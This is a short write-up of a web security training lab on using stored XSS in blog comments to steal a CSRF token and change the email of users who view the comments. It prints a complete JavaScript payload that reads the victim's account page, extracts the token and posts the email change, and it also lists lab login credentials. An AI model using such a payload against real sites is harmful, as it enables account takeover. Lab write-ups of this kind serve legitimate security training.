LAB 24 - Exploiting XSS to bypass CSRF defenses¶

Initial instructions¶

This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to steal a CSRF token, which you can then use to change the email address of someone who views the blog post comments.¶

You can log in to your own account using the following credentials: wiener:peter¶

First of all I logged in as wiener to view what functions I have in the panel, here I can update the email so this update mail does a POST request to /my-account/change-email

alt text

Once we know this I built this payload.

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

And I injected into the body section when posting a comment.

alt text

LAB 24 - Exploiting XSS to bypass CSRF defenses¶

Initial instructions¶

This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to steal a CSRF token, which you can then use to change the email address of someone who views the blog post comments.¶

You can log in to your own account using the following credentials: wiener:peter¶

Congratulations, you solved the lab!¶